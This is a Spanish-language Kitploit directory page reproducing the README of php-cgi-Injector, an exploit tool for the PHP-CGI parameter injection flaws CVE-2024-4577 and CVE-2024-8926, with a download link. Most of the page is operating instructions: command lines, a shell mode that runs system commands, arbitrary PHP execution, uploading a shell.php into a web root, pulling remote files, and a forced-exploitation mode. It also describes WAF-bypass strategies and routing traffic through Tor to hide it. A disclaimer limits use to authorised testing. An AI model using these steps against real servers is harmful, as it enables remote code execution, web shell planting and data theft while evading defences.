Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
php-cgi-Injector — Una herramienta de penetración de seguridad para probar CVE-2024-4577 y CVE-2024-8926. | Kitploit
Herramientas/GitHubGitHub/night-have-dreams/php-cgi-injector
Escáneres de VulnerabilidadesGeneración de PayloadsExplotaciónExplotación de Aplicaciones WebEvasión de WAFPruebas de PenetraciónComando y Control
GitHubnight-have-dreams/php-cgi-injector

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

php-cgi-Injector

Una herramienta de penetración de seguridad para probar CVE-2024-4577 y CVE-2024-8926.

Ver Repositorio
492hace 1 añoRevisado por Kitploit

PHP-CGI Injector

🚀 CVE-2024-4577 y CVE-2024-8926 Herramienta de Exploit

Herramienta de pruebas automatizadas para la vulnerabilidad de inyección de parámetros PHP-CGI, compatible con CVE-2024-4577 y CVE-2024-8926, que permite realizar ejecución de comandos, subida y descarga de archivos, entre otras operaciones.


📌 Introducción

Esta herramienta se puede utilizar para probar la vulnerabilidad de inyección de parámetros en entornos PHP-CGI y ofrece:

  • ✅ Interfaz de terminal moderna con efectos animados
  • ✅ Escaneo automatizado de vulnerabilidades
  • ✅ Múltiples modos de ataque (Shell, ejecución de código PHP, subida/descarga de archivos)
  • ✅ Combinaciones de payload predefinidas y personalizadas
  • ✅ Modo de ocultación de tráfico mediante Tor
  • ✅ Varios módulos de bypass WAF
  • ✅ Compatibilidad con conversión automática de codificación de salida
  • ✅ Modo de explotación forzada (se puede activar incluso si no se detecta la vulnerabilidad)
  • ❌ No prepara café, pero sí tuesta WAF.
  • ❌ No redacta informes por ti, no te consigue novia ni te ayuda a ingresar a un posgrado.
  • ❌ No realiza ingeniería social; tendrás que tratar tú mismo con los humanos.

📜 Descargo de responsabilidad

Esta herramienta está restringida a pruebas legales y fines académicos. ¡No la uses en sistemas no autorizados!

⚠️ ¡El uso ilegal conlleva responsabilidades legales!

Esta herramienta está destinada únicamente a:

  • 🔹 Pruebas de penetración de red team corporativo
  • 🔹 Investigación de seguridad en CTF
  • 🔹 Aprendizaje personal de seguridad
  • 🔹 Otras pruebas de seguridad con autorización legal

📥 Instalación de dependencias

Esta herramienta depende de los siguientes paquetes de Python; por favor, instálalos primero:

root@kitploit:~
pip install -r requirements.txt

O puedes instalarlos manualmente:

root@kitploit:~
pip install requests requests-tor chardet urllib3 rich

🛠️ Uso

📌 Uso básico

root@kitploit:~
python exploit.py -u URL [--timeout sec] [--delay sec] [--log] [--verbose] [--payload PAYLOAD] [--bypass] [--tor] [--no-effects] [--force] [--cgipoint PATHS...]

Ejemplos:

root@kitploit:~
python exploit.py -u http://example.com --timeout 30 --payload 2 --log --tor --verbose
python exploit.py -u http://example.com --bypass --force
python exploit.py -u http://example.com --cgipoint /php-cgi/php-cgi.exe /cgi-bin/php

📌 Opciones de parámetros


📌 Modos de operación

Cuando el script encuentra una vulnerabilidad, mostrará el siguiente menú:

root@kitploit:~
╭────────────  Exploit 模式選單  ────────────╮
│ 當前目標:http://example.com/              │
│ 當前注入點:/php-cgi/php-cgi.exe           │
│ 漏洞編號:CVE-2024-4577                    │
╰────────────────────────────────────────────╯
1) 🧪 Shell模式
2) 🛠️ PHP自訂端模式
3) 📤 上傳檔案
4) 📥 下載檔案
5) 🎯 切換攻擊目標
6) ⚙️ 設定參數
7) ❌ 離開程式
>>

📌 Explicación detallada de los modos

1️⃣ Modo Shell

Ejecuta comandos del sistema:

root@kitploit:~
shell> whoami

📂 Guardar salida

root@kitploit:~
shell> whoami --save
root@kitploit:~
shell> whoami --save C:\output\whoami.txt

2️⃣ Modo PHP personalizado

Ejecuta código PHP personalizado:

root@kitploit:~
phpinfo();
EOF

📂 Guardar salida

root@kitploit:~
phpinfo();
EOF --save
root@kitploit:~
phpinfo();
EOF --save C:\output\info.html

3️⃣ Subir archivo

root@kitploit:~
本地檔案路徑:C:\test\shell.php
目標完整路徑:
[*] 已自動設定上傳路徑為: C:/xampp/htdocs/shell.php

📂 Especificar la ruta manualmente

root@kitploit:~
目標完整路徑:C:\xampp\php\shell.php

4️⃣ Descargar archivo

root@kitploit:~
遠端檔案路徑:C:\xampp\htdocs\index.php

📂 Después de la descarga, el archivo se guarda en download/; si ya existe, se le añade un número automáticamente

root@kitploit:~
[*] 檔案下載完成,儲存在 download/index.php

5️⃣ Cambiar el objetivo del ataque

root@kitploit:~
輸入新目標URL: http://newtarget.com

🔹 Volverá a probar la vulnerabilidad


6️⃣ Cambio de parámetros

root@kitploit:~
[⚙️ 利用階段參數設定選單]

1) 切換荷載 Payload        1
2) 繞過模組 Bypass         未選擇
3) 等待時間 Timeout        10 秒
4) 請求延遲 Delay          0 秒
5) 自動紀錄 Log            關閉
6) 詳細模式 Verbose        關閉
7) 動畫效果 Effects        開啟
8) 強制利用 Force          關閉
9) 儲存並返回 Exploit 選單

📌 Módulos de bypass WAF

Se ofrecen las siguientes estrategias de bypass:

  • Mutación de la ruta CGI
  • Añadir caracteres no válidos antes y después del payload
  • Reemplazar php://input por otras notaciones
  • Añadir cabeceras HTTP específicas o aleatorias
  • Ofuscar el contenido POST
  • Barajar aleatoriamente el orden del payload
  • Script de bypass personalizado; consulta el formato en tamper_example_template.txt
Descargar herramienta
ParámetroDescripciónEjemplo
-u o --urlEspecifica la URL objetivo-u http://example.com
--timeout secEstablece el tiempo de espera de la solicitud (0 es infinito)--timeout 30
--logRegistra automáticamente los comandos de shell--log
--payloadEspecifica o personaliza la combinación de payload--payload 2
--torEnvía solicitudes a través de Tor--tor
--verboseMuestra información detallada--verbose
--bypassActiva el modo de bypass WAF--bypass
--forceFuerza la entrada al modo de explotación--force
--cgipoint PATHSEspecifica rutas CGI concretas para las pruebas--cgipoint /path
--delay secSegundos de retardo entre cada solicitud--delay 1.5
--no-effectsDesactiva todos los efectos de animación y retardo--no-effects